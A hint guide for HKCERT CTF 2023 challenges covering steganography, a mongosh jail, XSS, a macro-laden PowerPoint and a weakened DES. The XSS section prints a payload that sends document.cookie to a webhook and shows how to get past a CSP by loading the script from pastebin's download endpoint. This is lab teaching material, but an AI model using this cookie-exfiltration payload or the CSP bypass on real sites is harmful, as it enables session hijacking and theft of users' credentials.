# HKCERT CTF 2023: Guide to handwavy challenges (II)
## ST碼 (I) / ST Code (I) (Misc)
* Browse `/flag1` will result in a QR Code,but it looks uneven
* If you read the source code of the server carefully, you should know that it is a scalable vector graphic (SVG)
* View the source code of the image, you can find that there are some `rx="0"` and `rx="1"`, which are suspicious
* So this is the reason why the image looks uneven
* Record these numbers from the top to the bottom, you should get `01101000 01101011 ...`
* Can you guess what is the encoding scheme? __________
* Using this encoding scheme to decode,you should get `hkcert23{...`
* Looks like this is the flag!
<p style="transform: rotate(-180deg);">Answer:Binary ASCII Code</p>
## 獄門疆 / MongoJail (Pwn)
### Partial Spoiler
* This challenge seems to be unrelated to "Goku Mon Kyo"
* But it is related to MongoDB Shell (mongosh)
* mongosh is a specialized node.js "Read–eval–print" loop (REPL) environment
* You can enter any Javascript code in a restricted mongosh
* All built-in variables and functions, and `require`,`module`,`globalThis` are also ~~sealed~~ became undefined
* What else can we do? Let's have a look on the [Reference](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference)
* Built-in objects are all ~~sealed~~ became undefined
* Expressions & operators can still be used... At least you can do addition
* ||Spoiler: Which method can be used to open the other side of the seal?||
## 又有寶貝 XSS / Baby XSS again (Web)
* First, you should have some understanding about XSS challenges in CTF
* If you have no idea, maybe check out the description from [Infant XSS](https://github.com/blackb6a/hkcert-ctf-2021-challenges/tree/master/T1-infantxss) from HKCERT CTF 2021...
* Basically you need to find an XSS vulnerability and send the webpage with the payload to the bot to perform sensitive actions or capture sensitive information, such as Cookie
* For this challenge, the description has already told you that you can inject script using the `src` query string parameter, because of the following:
out += """<script src="%s"></script>""" % request.args.get("src", "http://example.com/")
* But there is Content Security Policy that restricts the source of the script to be from the domain `https://hcaptcha.com`,`https://*.hcaptcha.com` or `https://pastebin.com`:
<meta http-equiv="Content-Security-Policy" content="script-src https://hcaptcha.com https://*.hcaptcha.com https://pastebin.com">
* I don't think you want to craft your gadget in hcaptcha.com, so let's go for the pastebin
* First, craft a script that could redirect the victim to your webhook that captures sensitive information (The flag is in Cookie for this challenge), and post it on pastebin
* For example, `location='https://webhook.site/your_webhook_site_id/?cookie='+document.cookie`
* Then you should see your paste like this: https://pastebin.com/KvbMXuyv
* To keep only the script code, you may use the "raw" function: https://pastebin.com/raw/KvbMXuyv
* But when you tried to include the script, it doesn't work!
* http://babyxss-k7ltgk.hkcert23.pwnable.hk:28232/?src=https://pastebin.com/raw/KvbMXuyv
* Why? Because modern browser also checks the `Content-Type` header of the embedded file
* The content type of file managed to be `text/plain` in this case, which will not be executed as javascript
* How about the other way? Instead of "raw", we may also try "download": https://pastebin.com/dl/KvbMXuyv
* This time it works, the page indeed redirects: http://babyxss-k7ltgk.hkcert23.pwnable.hk:28232/?src=https://pastebin.com/dl/KvbMXuyv
* Then you can send this link to the bot (and fill in the annoying CAPTCHA) and get the flag
## 轉蛋模擬器 / Gacha Simulator (Reverse)
### Partial Guide
This challenge is best viewed with .NET Framework
This is a pptm file, which is Macro Enabled. Make sure you check out the VBA code under the Developer tab.
Can't see source code? Try this
Then there are many ways to solve, like changing the probability, rearrange the encrypted data, decrypt the encrypted data directly, etc. Good luck!
## 下手ですね / BADES (Crypto)
### Challenge Description
In this challenge, we are given an slightly modified [Data Encryption Standard](https://en.wikipedia.org/wiki/Data_Encryption_Standard) (denoted by DES'). Additionally, we are given the two oracles:
1. `encrypt_flag` encrypts the flag using DES'-CBC.
2. `encrypt` encrypts an arbitrary message using DES'-CBC.
The goal is to retrieve the flag using the above oracle calls.
### Partial Guide
With `__left_rotations` being changed, _all_ keys became weak keys. If we are using [electronic codebook (ECB)](https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB)) mode of operation, $\text{Encrypt}(\text{Encrypt}(m)) = m$, or intuitively, encrypting the same message twice would result in getting the message.
<p style="text-align: center;"><img src="https://hackmd.io/_uploads/HJDX812mp.png" style="width: 350px;"><br /><em>Figure 1.</em></p>
However, in this case, we are using the CBC mode. This is how the a message is encrypted when we use `encrypt_flag` (or `encrypt`). At the very beginning, the message is padded to a size of multiple of 8. After that, it is chopped into blocks of 8 bytes:
<p style="text-align: center;"><img src="https://hackmd.io/_uploads/ryrKjy2mT.png" style="width: 600px;"><br /><em>Figure 2.</em></p>
It is then encrypted to the ciphertext $c_0 \| c_1 \| c_2 \| ...$ which is given to us. How can we make use of the "encrypting the ciphertext actually decrypts it" behaviour to recover $m_1, m_2, ...$?
Let's show how we retrieve $m_1$ by encrypting $c_0 \oplus c_1$:
<p style="text-align: center;"><img src="https://hackmd.io/_uploads/S1jaXx37a.png" style="width: 350px;"><br /><em>Figure 3.</em></p>
Since $c_0 \oplus (c_0 \oplus c_1) = c_1$, the content we are passing to the encrypt function being $c_1$. In Figure 2, we know $\text{Encrypt}(c_1) = c_0 \oplus m_1$. Now we can recover $m_1$ by computing $c_0 \oplus (c_0 \oplus m_1)$.
Now decrypt the remaining blocks!